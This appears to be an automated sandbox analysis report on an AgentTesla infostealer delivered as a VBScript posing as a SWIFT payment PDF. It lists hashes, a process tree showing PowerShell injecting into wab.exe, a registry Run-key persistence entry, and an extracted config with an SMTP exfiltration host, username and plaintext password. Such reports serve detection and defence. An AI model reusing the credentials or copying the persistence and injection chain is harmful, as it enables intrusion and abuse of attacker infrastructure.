Analysis
  Max time kernel: 143s
  Max time network: 140s
  Platform: windows7_x64
  Resource: win7-20240215-en
  Resource tags: arch:x64, arch:x86, image:win7-20240215-en, locale:en-us, os:windows7-x64, system
  Submitted: 29-04-2024 17:25
  Static task: static1
  Behavioral task: behavioral1
    Sample: SWIFT Copy000224042024-pdf.vbs
    Resource: win7-20240215-en
  Behavioral task: behavioral2
    Sample: SWIFT Copy000224042024-pdf.vbs
    Resource: win10v2004-20240419-en
General
  Target: SWIFT Copy000224042024-pdf.vbs
  Size: 34KB
  MD5: ec0b0c5aca480e26979b6d7dda8cbb14
  SHA1: a98b3addf15724c049e1f2e44a071df9e7b0df21
  SHA256: d5271109119ab792f4d1adfa7e24979a19fed1b0d13092b78db4114e3e943170
  SHA512: b1deee49cd2f74b0c1c651414181e563dcdbd8658573380dc1dc419b5b8962df6f0105387eb0718087b4ac6efcc963fba3ca253c82cef10be4f07a38d986b713
  SSDEEP: 384:3E/p5dFHavtyX+hCajcYRn9LH/Y7Yzlgv9gufiQSKBq42:U/pRL+hDjcswPv9gyRSKBq42
Malware Config
  Extracted: agenttesla
    Protocol: smtp
    Host: mail.cash4cars.nz
    Port: 587
    Username: [email protected]
    Password: logs2024!
    Email To: [email protected]
Signatures
  AgentTesla
    Agent Tesla is a remote access tool (RAT) written in Visual Basic.
  Blocklisted process makes network request (3 IoCs)
    Processes:
      flow  pid   process
      3     2416  WScript.exe
      7     2592  powershell.exe
      9     2592  powershell.exe
  Adds Run key to start application (2 TTPs, 1 IoC)
    Processes:
      Set value (str) by wab.exe:
      \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\newfile = "C:\\Users\\Admin\\AppData\\Roaming\\newfile\\newfile.exe"
  Legitimate hosting services abused for malware hosting/C2 (1 TTP, 3 IoCs)
  Looks up external IP address via web service (1 IoC)
    Uses a legitimate IP lookup service to find the infected system's external IP.
    Processes:
      flow  ioc
      15    ip-api.com
  Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
    Processes:
      pid   process
      2932  wab.exe
  Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
    Processes:
      pid   process
      2464  powershell.exe
      2932  wab.exe
  Suspicious use of SetThreadContext (1 IoC)
    Processes:
      description                          pid   process         target process
      PID 2464 set thread context of 2932  2464  powershell.exe  wab.exe
  Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s).
  Suspicious behavior: EnumeratesProcesses (5 IoCs)
    Processes:
      pid   process
      2592  powershell.exe
      2464  powershell.exe
      2464  powershell.exe
      2932  wab.exe
      2932  wab.exe
  Suspicious behavior: MapViewOfSection (1 IoC)
    Processes:
      pid   process
      2464  powershell.exe
  Suspicious use of AdjustPrivilegeToken (3 IoCs)
    Processes:
      description              pid   process
      Token: SeDebugPrivilege  2592  powershell.exe
      Token: SeDebugPrivilege  2464  powershell.exe
      Token: SeDebugPrivilege  2932  wab.exe
  Suspicious use of WriteProcessMemory (20 IoCs)
    Processes (identical entries collapsed; the count column gives how many times each appears):
      description                       pid   process         target process  count
      PID 2416 wrote to memory of 2592  2416  WScript.exe     powershell.exe  3
      PID 2592 wrote to memory of 2692  2592  powershell.exe  cmd.exe         3
      PID 2592 wrote to memory of 2464  2592  powershell.exe  powershell.exe  4
      PID 2464 wrote to memory of 2964  2464  powershell.exe  cmd.exe         4
      PID 2464 wrote to memory of 2932  2464  powershell.exe  wab.exe         6
Processes
  C:\Windows\System32\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SWIFT Copy000224042024-pdf.vbs"
    PID: 2416
    - Blocklisted process makes network request
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: obfuscated PowerShell script (string-decoding stub plus encoded payload, several kilobytes; omitted)
      PID: 2592
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\cmd.exe
        Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\refulge.Bod && echo $"
        PID: 2692
      C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        Command line: the same obfuscated PowerShell script as the parent powershell.exe, re-run in the 32-bit (SysWOW64) host (omitted)
        PID: 2464
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\cmd.exe
          Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\refulge.Bod && echo $"
          PID: 2964
        C:\Program Files (x86)\windows mail\wab.exe
          Command line: "C:\Program Files (x86)\windows mail\wab.exe"
          PID: 2932
          - Adds Run key to start application
          - Suspicious use of NtCreateThreadExHideFromDebugger
          - Suspicious use of NtSetInformationThreadHideFromDebugger
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
  C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
    Filesize: 68KB
    MD5: 29f65ba8e88c063813cc50a4ea544e93
    SHA1: 05a7040d5c127e68c25d81cc51271ffb8bef3568
    SHA256: 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
    SHA512: e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
  C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize: 344B
    MD5: e44d83be9a7bee7471b5537eb9449ac4
    SHA1: 71cf5b343f2301261d5892e77546f393f1a320fe
    SHA256: eb7e9e756eaaae241537d372f5aeace0f2c488c78c153811bea7061ec14bc360
    SHA512: b5d795e50c03e1d731d9fac052d1633bbe73d00cd5243dde48040dfd32a8f48134cfe30ade6cbe8acf72404c68ef0a20d7d13d051c4c9d151f2b93edb1b0e3cc
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\F33NKT0XLGI480HAGR5T.temp
    Filesize: 7KB
    MD5: c8e5d23b0f1a97e8f4bd5d5cc60c0829
    SHA1: 43aa2f7a34ee23dfce5b4c3d1d7c2716c93520cf
    SHA256: 9ff7f822ba34c712f24d75637234e597ed80bc4d0cb11ec58ee6ec7ef04aaa63
    SHA512: a4e2b0a5b160bed966ab12e829be0337ce19764afc6db4de3de72c1a91ec19092886b0de0fe9ffc97dd717e2337a77e8c2940386b7447be9159fe31ae026a5eb
  C:\Users\Admin\AppData\Roaming\refulge.Bod
    Filesize: 442KB
    MD5: d46f9ca4ea9e4dd43d582b9f2e38199e
    SHA1: 09f5c2a00e0f709038145b03889e3ab6263824ed
    SHA256: 94dc661c05f18accf414194688b8950a9e0180df256227f30acf4c606a923d6e
    SHA512: 7cd257aa22802931aa5b9c6adee5a6430fb587da25da24e2756b0aa50af9b47f478e19705b117dc2d6032c410565a027c4545b12aedb403e3ff389567087681b
  Memory dumps (name, filesize):
    memory/2464-34-0x0000000006670000-0x00000000076A8000-memory.dmp  16.2MB
    memory/2592-24-0x0000000002BA0000-0x0000000002C20000-memory.dmp  512KB
    memory/2592-36-0x0000000002BA0000-0x0000000002C20000-memory.dmp  512KB
    memory/2592-28-0x0000000002BA0000-0x0000000002C20000-memory.dmp  512KB
    memory/2592-21-0x000000001B670000-0x000000001B952000-memory.dmp  2.9MB
    memory/2592-25-0x0000000002BA0000-0x0000000002C20000-memory.dmp  512KB
    memory/2592-27-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp  9.6MB
    memory/2592-35-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp  9.6MB
    memory/2592-23-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp  9.6MB
    memory/2592-38-0x0000000002BA0000-0x0000000002C20000-memory.dmp  512KB
    memory/2592-37-0x0000000002BA0000-0x0000000002C20000-memory.dmp  512KB
    memory/2592-39-0x0000000002BA0000-0x0000000002C20000-memory.dmp  512KB
    memory/2592-26-0x0000000002BA0000-0x0000000002C20000-memory.dmp  512KB
    memory/2592-22-0x0000000001D20000-0x0000000001D28000-memory.dmp  32KB
    memory/2592-65-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp  9.6MB
    memory/2932-64-0x0000000000A50000-0x0000000001AB2000-memory.dmp  16.4MB
    memory/2932-66-0x0000000000A50000-0x0000000000A92000-memory.dmp  264KB